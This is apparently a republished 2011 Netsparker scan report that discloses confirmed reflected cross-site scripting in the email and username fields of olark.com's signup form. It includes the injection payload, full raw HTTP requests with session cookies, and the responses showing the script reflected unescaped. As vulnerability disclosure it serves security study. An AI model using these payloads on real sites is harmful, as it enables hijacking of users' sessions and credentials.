XSS, Cross Site Scripting in www.olark.com, CWE-79, CAPEC-86, DORK, GHDB REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading
Netsparker - Scan Report Summary
TARGET URL
 http://www.olark.com/signup/create_new_accoun...
SCAN DATE
 6/4/2011 4:43:56 PM
REPORT DATE
 6/4/2011 4:56:46 PM
SCAN DURATION
 00:02:49

Total Requests

Average Speed

req/sec.
8
identified
4
confirmed
0
critical
0
informational

SCAN SETTINGS

Scan Settings
PROFILE
 Previous Settings
ENABLED ENGINES
 Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
25 %
LOW
75 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/signup/create_new_account user[email] POST Cross-site Scripting Yes
user[username] POST Cross-site Scripting Yes
Cookie Not Marked As HttpOnly Yes
Apache Version Disclosure No
PHP Version Disclosure No
OpenSSL Version Disclosure No
Apache Module Version Disclosure No
TRACE / TRACK Identified Yes
Cross-site Scripting

Cross-site Scripting
2 TOTAL
IMPORTANT
CONFIRMED
2
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /signup/create_new_account

/signup/create_new_account CONFIRMED

http://www.olark.com/signup/create_new_account

Parameters

Parameter Type Value
commit POST Continue
user[email] POST '"--></style></script><script>alert(0x000022)</script>
user[password] POST 3
user[password_confirmation] POST 3
user[username] POST Smith

Request

POST /signup/create_new_account HTTP/1.1
Referer: http://www.olark.com/signup/create_new_account
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.olark.com
Cookie: uuid=0774d7bc917fd9f9f1f1f24dbe02c0e2; rack_session=BAh7CzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6HnF1ZXJ5X3N0cmlu%0AZ19mb3Jfc3ByZWVkbHkiZm5zZXh0dD0lMDAlMjclMjItLSUzRSUzQyUyRnN0%0AeWxlJTNFJTNDJTJGc2NyaXB0JTNFJTNDc2NyaXB0JTNFbmV0c3Bhcmtlcigw%0AeDAwMDAwNCklM0MlMkZzY3JpcHQlM0U6GG1peHBhbmVsX3Byb3BlcnRpZXN7%0ACDoWZnVsbHNjcmVlbl9sYXlvdXRUOgl0ZXN0Ihh0ZXN0MTogbGVzcyBkZXRh%0AaWxzOhF0ZXN0aW1vbmlhbHNUOhRwb3N0X3NpZ251cF91cmwiK2h0dHA6Ly93%0Ad3cub2xhcmsuY29tL3NpZ251cC9hZnRlcnBsYW5zOhFodHRwX3JlZmVyZXIi%0AM2h0dHA6Ly93d3cub2xhcmsuY29tL3NpZ251cC9jcmVhdGVfbmV3X2FjY291%0AbnQ6FXNwcmVlZGx5X3BsYW5faWQw%0A; _habla_session_id=67ba94420cca2143caba5458cb9ee0ce
Content-Length: 181
Accept-Encoding: gzip, deflate

commit=Continue&user[email]='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000022)%3c%2fscript%3e&user[password]=3&user[password_confirmation]=3&user[username]=Smith

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:44:54 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "37fa86b3a7e19d1885c57272c4d4266b"
X-Runtime: 1219
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 6378
Content-Type: text/html; charset=utf-8
Set-Cookie: rack_session=BAh7CzoecXVlcnlfc3RyaW5nX2Zvcl9zcHJlZWRseSJmbnNleHR0PSUwMCUy%0ANyUyMi0tJTNFJTNDJTJGc3R5bGUlM0UlM0MlMkZzY3JpcHQlM0UlM0NzY3Jp%0AcHQlM0VuZXRzcGFya2VyKDB4MDAwMDA0KSUzQyUyRnNjcmlwdCUzRToOaXBh%0AZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6GG1peHBhbmVsX3Byb3BlcnRpZXN7%0ACDoWZnVsbHNjcmVlbl9sYXlvdXRUOgl0ZXN0Ihh0ZXN0MTogbGVzcyBkZXRh%0AaWxzOhF0ZXN0aW1vbmlhbHNUOhRwb3N0X3NpZ251cF91cmwiK2h0dHA6Ly93%0Ad3cub2xhcmsuY29tL3NpZ251cC9hZnRlcnBsYW5zOhVzcHJlZWRseV9wbGFu%0AX2lkMDoRaHR0cF9yZWZlcmVyIjNodHRwOi8vd3d3Lm9sYXJrLmNvbS9zaWdu%0AdXAvY3JlYXRlX25ld19hY2NvdW50%0A; path=/,_habla_session_id=ee60d6a9edd2dc820edb4520eae5ed8b; path=/
Via: 1.1 web2.local


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html> <head> <script type='text/javascript'> //<![CDATA[ // KISSmetrics code var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/3225b0c50e306468d63651238f71383a01850728.1.js'); //]]> </script> <title> Olark | Signup </title> <meta content='Real-time chat and monitoring of your website visitors through Google Talk and Jabber' name='description' /> <meta content='Olark, chat, livehelp, livesales, free, website, visitors, website monitoring, visitor monitoring, gtalk' name='keywords' /> <link href='/stylesheets/compiled/screen.css' media='screen, projection' rel='stylesheet' type='text/css' /> <link href='/stylesheets/compiled/print.css' media='print' rel='stylesheet' type='text/css' /> <!--[if IE]><link rel="stylesheet" href="/stylesheets/compiled/ie.css" type="text/css" media="screen, projection"><![endif]--> <link href='/images/sky/common/favicon.ico' rel='shortcut icon' type='image/x-icon' /> <script type='text/javascript'> //<![CDATA[ var gaJsHost = (("https:" == document.location.protocol) ? "https://" : "http://"); document.write(unescape("%3Cscript src='" + gaJsHost + "ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js' type='text/javascript'%3E%3C/script%3E")); //]]> </script> <!--[if IE 6]><script type='text/javascript' src="/javascripts/pngfix/DD_belatedPNG.js"></script><![endif]--> <!--[if IE 6]> <script type='text/javascript'> $(document).ready(function(){ DD_belatedPNG.fix('#control_navigation_primary li, .page, .background_container, .one, .two, #thisone, a, img, h1, .button, #top, #bottom'); }); </script> <![endif]--> <script type='text/javascript'> //<![CDATA[ (function(){ window.load_async = function(src, callback){ var a = document.createElement("script"); a.type = "text/javascript"; if(a.readyState){//IE a.onreadystatechange = function(){ if (a.readyState == "loaded" || a.readyState == "complete"){ a.onreadystatechange = null; callback(); } }; }else{//Others a.onload = function(){ callback(); }; } $(document).ready(function(){ a.src = (document.location.protocol == 'https:' ? "https:" : "http:") + "//" + src; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(a,s); }); } })(); //]]> </script> <!-- Google Website Optimizer Control Script --> <script> function utmx_section(){}function utmx(){} (function(){var k='3820629337',d=document,l=d.location,c=d.cookie;function f(n){ if(c){var i=c.indexOf(n+'=');if(i>-1){var j=c.indexOf(';',i);return c.substring(i+n. length+1,j<0?c.length:j)}}}var x=f('__utmx'),xx=f('__utmxx'),h=l.hash; d.write('<sc'+'ript src="'+ 'http'+(l.protocol=='https:'?'s://ssl':'://www')+'.google-analytics.com' +'/siteopt.js?v=1&utmxkey='+k+'&utmx='+(x?x:'')+'&utmxx='+(xx?xx:'')+'&utmxtime=' +new Date().valueOf()+(h?'&utmxhash='+escape(h.substr(1)):'')+ '" type="text/javascript" charset="utf-8"></sc'+'ript>')})(); </script> <!-- End of Google Website Optimizer Control Script --> </head> <body> <div class=' main_background' id='signup'> <div id='fullscreen'> <div class='container'> <a href='/' id='floatinglogo' target='_blank'></a> <div id='top'></div> <div class='page'> <script type='text/javascript'> //<![CDATA[ _kmq.push(['record', 'Viewed Signup Page']); //]]> </script> <div id='login_state'> <h2> Get Excited! </h2> <hr /> <h3> You're about to sign up for the <span class='plan-title'> Free </span> plan! <p> <i> <small> or choose one of our <a href='/signup/plans'> professional plans </a> </small> </i> </p> </h3> <div class='span-16'> <form action="/signup/create_new_account" id="create_new_account" method="post"> <div class="errorExplanation" id="errorExplanation"><h2>4 errors prohibited this user from being saved</h2><p>There were problems with the following fields:</p><ul><li>Username should contain only letters and numbers</li><li>Username should contain only letters and numbers</li><li>Email should contain an @</li><li>Password should be at least 5 characters long</li></ul></div> <ul class='label-top'> <li class='text required'> <label> Enter your email address <span>*</span> </label> <input type="text" value="Smith" name="user[username]"> </li> <li class='text required'> <label> Pick a username <span>*</span> </label> <input type="text" value="'"--></style></script><script>netsparker(0x000022)</script>" name="user[email]"> </li> <li class='text required'> <div class='clear'></div> <div class='half-left'> <label> Pick a password <span>*</span> </label> <span class="fieldWithErrors"><input id="user_password" name="user[password]" size="30" type="password" value="" /></span> </div> <div class='half-right'> <label> Re-enter your password <span>*</span> </label> <input id="user_password_confirmation" name="user[password_confirmation]" size="30" type="password" /> </div> <div class='clear'></div> </li> <li class='required'> <i> By clicking 'Continue' I agree to Olark’s <a href='/pages/tos' target='blank'>terms of service</a> <b> <span> * </span> </b> </i> </li> <li class='buttons'> <input class="button green_border" name="commit" type="submit" value="Continue" /> <a class='button blank_border orange' href='/signup/plans'> Choose another plan </a> <div class='clear'></div> </li> <p></p> </ul> </form> </div> <div class='span-6 last'> <div class="testimonial">I am happy I switched shopify.com to Olark. SO much cleaner to integrate with you guys :)<div class="testimonial-attribution">Daniel Weinand<br>shopify.com</div></div><div class="testimonial">Olark is the most powerful thing on the planet I've found to increase conversions<div class="testimonial-attribution">Dane Maxwell<br>paperlesspipeline.com</div></div> </div> </div> <!-- Google Website Optimizer Tracking Script --> <script type="text/javascript"> if(typeof(_gat)!='object')document.write('<sc'+'ript src="http'+ (document.location.protocol=='https:'?'s://ssl':'://www')+ '.google-analytics.com/ga.js"></sc'+'ript>')</script> <script type="text/javascript"> try { var gwoTracker=_gat._getTracker("UA-7433195-1"); gwoTracker._trackPageview("/3820629337/test"); }catch(err){}</script> <!-- End of Google Website Optimizer Tracking Script --> </div> <div id='bottom'></div> </div> </div> </div> <script>var hbl_to_set_username="'"--></style></script><script>netsparker(0x000022)</script>";</script> <!-- begin olark code --> <script type='text/javascript'> window.olark||(function(c){var f=window,d=document,l=f.location.protocol=="https:"?"https:":"http:",z=c.name,r="load";(function(){f[z]=function(){ (a.s=a.s||[]).push(arguments)};var a=f[z]._={},q=c.methods.length;while(q--){(function(n){f[z][n]=function(){f[z]("call",n,arguments)}})(c.methods[q] )}a.v=0;a.l=c.loader;a.i=arguments.callee;a.f=setTimeout(function(){if(a.f){(new Image).src=l+"//"+a.l.replace(".js",".png")+"&"+escape(f.location.href) }a.f=null},20000);a.p={0:+new Date};a.P=function(u){a.p[u]=new Date-a.p[0]};function s(){a.P(r);f[z](r)}f.addEventListener?f.addEventListener(r,s,false ):f.attachEvent("on"+r,s);(function(){function p(){return["<head></head><",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h, "('script')).",k,"='",l,"//",a.l,"'\"></",i,">"].join("")}var i="body",m=d[i];if(!m){return setTimeout(arguments.callee,100)}a.P(1);var j="appendChild", h="createElement",k="src",n=d[h]("div"),v=n[j](d[h](z)),b=d[h]("iframe"),g="document",e="domain",o;n.style.display="none";m.insertBefore(n,m.firstChild ).id=z;b.frameBorder="0";b.id=z+"-loader";if(/MSIE\s+6/.test(navigator.userAgent)){b.src="javascript:false"}b.allowTransparency="true";v[j](b);try{ b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g]; t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.P(2)})()})()})({loader:(function(m){ return"static.olark.com/jsclient/loader0.js?ts="+(m?m[1]:(+new Date))})(document.cookie.match(/olarkld=(\d+)/)), name:"olark",methods:["configure","extend","declare","identify"]}); olark.identify('9353-431-10-4341');</script> <!-- end olark code --> <script type='text/javascript'> //<![CDATA[ olark.extend(function(api){ api.chat.updateVisitorNickname({snippet: window.hbl_to_set_username}); }); //]]> </script> <script src="/assets/common.js?1307133378" type="text/javascript"></script> <script type='text/javascript'> //<![CDATA[ (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(ga); })(); try { window.mpmetrics = new MixpanelLib("0908d20dfe9d3ea7c81e64bb4ffd7d36"); } catch(err) {} //]]> </script> <script type="text/javascript"> adroll_adv_id = "HYX6JMFHEBBHJEIEFT5BJD"; adroll_pix_id = "BP2WER5KN5CGFOUBWKGVKX"; (function () { var oldonload = window.onload; window.onload = function(){ __adroll_loaded=true; var scr = document.createElement("script"); var host = (("https:" == document.location.protocol) ? "https://s.adroll.com" : "http://a.adroll.com"); scr.setAttribute('async', 'true'); scr.type = "text/javascript"; scr.src = host + "/j/roundtrip.js"; document.documentElement.firstChild.appendChild(scr); if(oldonload){oldonload()}}; }()); </script> <script> $(document).ready(function(){ window.createQtip = function(kwargs) { var url = kwargs.url; var tooltip_text = kwargs.text; var dom_item = kwargs.object; var caller_controller = 'signup'; var caller_action = 'create_new_account'; var caller_id = ''; if(!url.match(/\?/)){ url += "?"; } url += "&caller_action=" + caller_action; url += "&caller_controller=" + caller_controller; // Add the caller_id if it is defined if(caller_id){ url += "&caller_id=" + caller_id; } $(dom_item).bind('click', function(event){ event.preventDefault(); return false; }).qtip({ content: { // Set the text to an image HTML string with the correct src URL to the loading image you want to use text: 'loading...', url: url, // Use the rel attribute of each element for the url to load title: { text: tooltip_text, // Give the tooltip a title using each elements text button: 'Close' // Show a close link in the title } }, position: { target: $(document.body), // Position it via the document body... corner: 'center' // ...at the center of the viewport }, show: { when: 'click', solo: true, // Only show one tooltip at a time effect: { type: 'fade' } }, hide: 'unfocus', style: { width: { max: 800, min: 750 }, padding: '14px', border: { width: 9, radius: 9, color: '#666666' }, name: 'light' } }); }; //Modal dialog boxes for mini-tutorials $('#todo a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.disable-transcripts a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: "Upgrade for Transcripts"}); }); $('.operator_list a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('#group_operator_list a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.search_for_tooltips a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.shopify_intro_video a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.video a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); if($.query.get("show_dialog") ) { // create a new dom object and then show the dialog based on this new item // TODO: have a way to hide tooltips var tm..
- /signup/create_new_account

/signup/create_new_account CONFIRMED

http://www.olark.com/signup/create_new_account

Parameters

Parameter Type Value
commit POST Continue
user[email] POST netsparker@example.com
user[password] POST 3
user[password_confirmation] POST 3
user[username] POST '"--></style></script><script>alert(0x000042)</script>

Request

POST /signup/create_new_account HTTP/1.1
Referer: http://www.olark.com/signup/create_new_account
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.olark.com
Cookie: uuid=0774d7bc917fd9f9f1f1f24dbe02c0e2; rack_session=BAh7CzoecXVlcnlfc3RyaW5nX2Zvcl9zcHJlZWRseSIAOg5pcGFkZHJlc3Mi%0AFDE3My4xOTMuMjE0LjI0MzoYbWl4cGFuZWxfcHJvcGVydGllc3sIOhZmdWxs%0Ac2NyZWVuX2xheW91dFQ6CXRlc3QiGHRlc3QxOiBsZXNzIGRldGFpbHM6EXRl%0Ac3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVwX3VybCIraHR0cDovL3d3dy5vbGFy%0Aay5jb20vc2lnbnVwL2FmdGVycGxhbnM6FXNwcmVlZGx5X3BsYW5faWQwOhFo%0AdHRwX3JlZmVyZXIiM2h0dHA6Ly93d3cub2xhcmsuY29tL3NpZ251cC9jcmVh%0AdGVfbmV3X2FjY291bnQ%3D%0A; _habla_session_id=fc373430b2aae339837f251eb558a8ad
Content-Length: 200
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

commit=Continue&user[email]=netsparker%40example.com&user[password]=3&user[password_confirmation]=3&user[username]='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000042)%3c%2fscript%3e

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:45:39 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "cc6b0307e32e77acad9123a8fa3a82e0"
X-Runtime: 349
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 6390
Content-Type: text/html; charset=utf-8
Set-Cookie: rack_session=BAh7CzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6HnF1ZXJ5X3N0cmlu%0AZ19mb3Jfc3ByZWVkbHkiADoYbWl4cGFuZWxfcHJvcGVydGllc3sIOhZmdWxs%0Ac2NyZWVuX2xheW91dFQ6CXRlc3QiGHRlc3QxOiBsZXNzIGRldGFpbHM6EXRl%0Ac3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVwX3VybCIraHR0cDovL3d3dy5vbGFy%0Aay5jb20vc2lnbnVwL2FmdGVycGxhbnM6EWh0dHBfcmVmZXJlciIzaHR0cDov%0AL3d3dy5vbGFyay5jb20vc2lnbnVwL2NyZWF0ZV9uZXdfYWNjb3VudDoVc3By%0AZWVkbHlfcGxhbl9pZDA%3D%0A; path=/,_habla_session_id=c42bc7b28c48d3f742845229b6cd2251; path=/
Via: 1.1 web2.local
Keep-Alive: timeout=15, max=46
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html> <head> <script type='text/javascript'> //<![CDATA[ // KISSmetrics code var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/3225b0c50e306468d63651238f71383a01850728.1.js'); //]]> </script> <title> Olark | Signup </title> <meta content='Real-time chat and monitoring of your website visitors through Google Talk and Jabber' name='description' /> <meta content='Olark, chat, livehelp, livesales, free, website, visitors, website monitoring, visitor monitoring, gtalk' name='keywords' /> <link href='/stylesheets/compiled/screen.css' media='screen, projection' rel='stylesheet' type='text/css' /> <link href='/stylesheets/compiled/print.css' media='print' rel='stylesheet' type='text/css' /> <!--[if IE]><link rel="stylesheet" href="/stylesheets/compiled/ie.css" type="text/css" media="screen, projection"><![endif]--> <link href='/images/sky/common/favicon.ico' rel='shortcut icon' type='image/x-icon' /> <script type='text/javascript'> //<![CDATA[ var gaJsHost = (("https:" == document.location.protocol) ? "https://" : "http://"); document.write(unescape("%3Cscript src='" + gaJsHost + "ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js' type='text/javascript'%3E%3C/script%3E")); //]]> </script> <!--[if IE 6]><script type='text/javascript' src="/javascripts/pngfix/DD_belatedPNG.js"></script><![endif]--> <!--[if IE 6]> <script type='text/javascript'> $(document).ready(function(){ DD_belatedPNG.fix('#control_navigation_primary li, .page, .background_container, .one, .two, #thisone, a, img, h1, .button, #top, #bottom'); }); </script> <![endif]--> <script type='text/javascript'> //<![CDATA[ (function(){ window.load_async = function(src, callback){ var a = document.createElement("script"); a.type = "text/javascript"; if(a.readyState){//IE a.onreadystatechange = function(){ if (a.readyState == "loaded" || a.readyState == "complete"){ a.onreadystatechange = null; callback(); } }; }else{//Others a.onload = function(){ callback(); }; } $(document).ready(function(){ a.src = (document.location.protocol == 'https:' ? "https:" : "http:") + "//" + src; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(a,s); }); } })(); //]]> </script> <!-- Google Website Optimizer Control Script --> <script> function utmx_section(){}function utmx(){} (function(){var k='3820629337',d=document,l=d.location,c=d.cookie;function f(n){ if(c){var i=c.indexOf(n+'=');if(i>-1){var j=c.indexOf(';',i);return c.substring(i+n. length+1,j<0?c.length:j)}}}var x=f('__utmx'),xx=f('__utmxx'),h=l.hash; d.write('<sc'+'ript src="'+ 'http'+(l.protocol=='https:'?'s://ssl':'://www')+'.google-analytics.com' +'/siteopt.js?v=1&utmxkey='+k+'&utmx='+(x?x:'')+'&utmxx='+(xx?xx:'')+'&utmxtime=' +new Date().valueOf()+(h?'&utmxhash='+escape(h.substr(1)):'')+ '" type="text/javascript" charset="utf-8"></sc'+'ript>')})(); </script> <!-- End of Google Website Optimizer Control Script --> </head> <body> <div class=' main_background' id='signup'> <div id='fullscreen'> <div class='container'> <a href='/' id='floatinglogo' target='_blank'></a> <div id='top'></div> <div class='page'> <script type='text/javascript'> //<![CDATA[ _kmq.push(['record', 'Viewed Signup Page']); //]]> </script> <div id='login_state'> <h2> Get Excited! </h2> <hr /> <h3> You're about to sign up for the <span class='plan-title'> Free </span> plan! <p> <i> <small> or choose one of our <a href='/signup/plans'> professional plans </a> </small> </i> </p> </h3> <div class='span-16'> <form action="/signup/create_new_account" id="create_new_account" method="post"> <div class="errorExplanation" id="errorExplanation"><h2>4 errors prohibited this user from being saved</h2><p>There were problems with the following fields:</p><ul><li>Username should contain only letters and numbers</li><li>Username should contain only letters and numbers</li><li>Email should contain an @</li><li>Password should be at least 5 characters long</li></ul></div> <ul class='label-top'> <li class='text required'> <label> Enter your email address <span>*</span> </label> <input type="text" value="'"--></style></script><script>netsparker(0x000042)</script>" name="user[username]"> </li> <li class='text required'> <label> Pick a username <span>*</span> </label> <input type="text" value="netsparker@example.com" name="user[email]"> </li> <li class='text required'> <div class='clear'></div> <div class='half-left'> <label> Pick a password <span>*</span> </label> <span class="fieldWithErrors"><input id="user_password" name="user[password]" size="30" type="password" value="" /></span> </div> <div class='half-right'> <label> Re-enter your password <span>*</span> </label> <input id="user_password_confirmation" name="user[password_confirmation]" size="30" type="password" /> </div> <div class='clear'></div> </li> <li class='required'> <i> By clicking 'Continue' I agree to Olark’s <a href='/pages/tos' target='blank'>terms of service</a> <b> <span> * </span> </b> </i> </li> <li class='buttons'> <input class="button green_border" name="commit" type="submit" value="Continue" /> <a class='button blank_border orange' href='/signup/plans'> Choose another plan </a> <div class='clear'></div> </li> <p></p> </ul> </form> </div> <div class='span-6 last'> <div class="testimonial">I am happy I switched shopify.com to Olark. SO much cleaner to integrate with you guys :)<div class="testimonial-attribution">Daniel Weinand<br>shopify.com</div></div><div class="testimonial">Olark is the most powerful thing on the planet I've found to increase conversions<div class="testimonial-attribution">Dane Maxwell<br>paperlesspipeline.com</div></div> </div> </div> <!-- Google Website Optimizer Tracking Script --> <script type="text/javascript"> if(typeof(_gat)!='object')document.write('<sc'+'ript src="http'+ (document.location.protocol=='https:'?'s://ssl':'://www')+ '.google-analytics.com/ga.js"></sc'+'ript>')</script> <script type="text/javascript"> try { var gwoTracker=_gat._getTracker("UA-7433195-1"); gwoTracker._trackPageview("/3820629337/test"); }catch(err){}</script> <!-- End of Google Website Optimizer Tracking Script --> </div> <div id='bottom'></div> </div> </div> </div> <script>var hbl_to_set_username="netsparker%%%%example.com";</script> <!-- begin olark code --> <script type='text/javascript'> window.olark||(function(c){var f=window,d=document,l=f.location.protocol=="https:"?"https:":"http:",z=c.name,r="load";(function(){f[z]=function(){ (a.s=a.s||[]).push(arguments)};var a=f[z]._={},q=c.methods.length;while(q--){(function(n){f[z][n]=function(){f[z]("call",n,arguments)}})(c.methods[q] )}a.v=0;a.l=c.loader;a.i=arguments.callee;a.f=setTimeout(function(){if(a.f){(new Image).src=l+"//"+a.l.replace(".js",".png")+"&"+escape(f.location.href) }a.f=null},20000);a.p={0:+new Date};a.P=function(u){a.p[u]=new Date-a.p[0]};function s(){a.P(r);f[z](r)}f.addEventListener?f.addEventListener(r,s,false ):f.attachEvent("on"+r,s);(function(){function p(){return["<head></head><",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h, "('script')).",k,"='",l,"//",a.l,"'\"></",i,">"].join("")}var i="body",m=d[i];if(!m){return setTimeout(arguments.callee,100)}a.P(1);var j="appendChild", h="createElement",k="src",n=d[h]("div"),v=n[j](d[h](z)),b=d[h]("iframe"),g="document",e="domain",o;n.style.display="none";m.insertBefore(n,m.firstChild ).id=z;b.frameBorder="0";b.id=z+"-loader";if(/MSIE\s+6/.test(navigator.userAgent)){b.src="javascript:false"}b.allowTransparency="true";v[j](b);try{ b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g]; t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.P(2)})()})()})({loader:(function(m){ return"static.olark.com/jsclient/loader0.js?ts="+(m?m[1]:(+new Date))})(document.cookie.match(/olarkld=(\d+)/)), name:"olark",methods:["configure","extend","declare","identify"]}); olark.identify('9353-431-10-4341');</script> <!-- end olark code --> <script type='text/javascript'> //<![CDATA[ olark.extend(function(api){ api.chat.updateVisitorNickname({snippet: window.hbl_to_set_username}); }); //]]> </script> <script src="/assets/common.js?1307133378" type="text/javascript"></script> <script type='text/javascript'> //<![CDATA[ (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(ga); })(); try { window.mpmetrics = new MixpanelLib("0908d20dfe9d3ea7c81e64bb4ffd7d36"); } catch(err) {} //]]> </script> <script type="text/javascript"> adroll_adv_id = "HYX6JMFHEBBHJEIEFT5BJD"; adroll_pix_id = "BP2WER5KN5CGFOUBWKGVKX"; (function () { var oldonload = window.onload; window.onload = function(){ __adroll_loaded=true; var scr = document.createElement("script"); var host = (("https:" == document.location.protocol) ? "https://s.adroll.com" : "http://a.adroll.com"); scr.setAttribute('async', 'true'); scr.type = "text/javascript"; scr.src = host + "/j/roundtrip.js"; document.documentElement.firstChild.appendChild(scr); if(oldonload){oldonload()}}; }()); </script> <script> $(document).ready(function(){ window.createQtip = function(kwargs) { var url = kwargs.url; var tooltip_text = kwargs.text; var dom_item = kwargs.object; var caller_controller = 'signup'; var caller_action = 'create_new_account'; var caller_id = ''; if(!url.match(/\?/)){ url += "?"; } url += "&caller_action=" + caller_action; url += "&caller_controller=" + caller_controller; // Add the caller_id if it is defined if(caller_id){ url += "&caller_id=" + caller_id; } $(dom_item).bind('click', function(event){ event.preventDefault(); return false; }).qtip({ content: { // Set the text to an image HTML string with the correct src URL to the loading image you want to use text: 'loading...', url: url, // Use the rel attribute of each element for the url to load title: { text: tooltip_text, // Give the tooltip a title using each elements text button: 'Close' // Show a close link in the title } }, position: { target: $(document.body), // Position it via the document body... corner: 'center' // ...at the center of the viewport }, show: { when: 'click', solo: true, // Only show one tooltip at a time effect: { type: 'fade' } }, hide: 'unfocus', style: { width: { max: 800, min: 750 }, padding: '14px', border: { width: 9, radius: 9, color: '#666666' }, name: 'light' } }); }; //Modal dialog boxes for mini-tutorials $('#todo a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); 